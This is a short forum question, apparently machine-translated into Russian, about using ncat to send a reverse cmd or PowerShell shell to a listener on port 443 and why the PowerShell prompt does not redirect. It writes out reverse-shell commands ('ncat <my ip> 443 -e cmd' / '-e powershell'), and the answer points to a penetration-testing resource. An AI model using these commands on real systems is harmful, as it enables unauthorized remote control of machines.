Я использую ncat для выполнения обратной оболочки "cmd" с одной машины на другую и без каких-либо проблем, используя команды:
In my machine: ncat -l 443
In the remote machine: ncat <my ip> 443 -e cmd
И все работает безупречно, однако я бы очень предпочел, чтобы выполнялся "powershell" вместо "cmd", для этого я сделал следующее:
In my machine: ncat -l 443
In the remote machine: ncat <my ip> 443 -e powershell
Но теперь происходит странная вещь: приглашение powershell выдается на удаленную машину, а не на мою ... Это результат:
In my machine: Windows Powershell
Copyright 2009 Microsoft Corporation. All rights reserverd. (and it hangs there)
In the remote machine: PS C:\Users\User> (the shell is actually given to the remote machine)
Есть ли способ снова перенаправить это приглашение на мою машину и иметь оболочку "powershell" на моем компьютере, как я сделал с оболочкой "cmd"? Я искал перенаправление stdout, но не смог заставить его работать :(
Любая помощь будет очень высоко ценится.
Это должно помочь вам встать на правильный путь:
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html